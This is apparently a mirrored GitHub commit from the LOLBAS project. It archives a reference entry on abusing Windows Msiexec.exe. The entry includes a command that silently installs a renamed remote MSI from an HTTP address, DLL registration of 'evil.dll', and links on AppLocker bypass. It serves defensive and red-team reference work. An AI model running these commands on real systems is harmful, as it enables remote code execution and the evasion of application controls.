mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-29 05:31:53 +02:00
Removed MD files, we only use the webportal from now on. All MD files moved to archive
This commit is contained in:
27
Archive-Old-Version/OSBinaries/Msiexec.exe.md
Normal file
27
Archive-Old-Version/OSBinaries/Msiexec.exe.md
Normal file
@@ -0,0 +1,27 @@
|
||||
## Msiexec.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
msiexec /quiet /i cmd.msi
|
||||
Installs the target .MSI file silently.
|
||||
|
||||
msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
||||
Installs the target remote & renamed .MSI file silently.
|
||||
|
||||
msiexec /y "C:\folder\evil.dll"
|
||||
Calls DLLRegisterServer to register the target DLL.
|
||||
|
||||
msiexec /z "C:\folder\evil.dll"
|
||||
Calls DLLRegisterServer to un-register the target DLL.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
||||
* https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\msiexec.exe
|
||||
* c:\windows\sysWOW64\msiexec.exe
|
||||
|
||||
* Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman
|
||||
|
Reference in New Issue
Block a user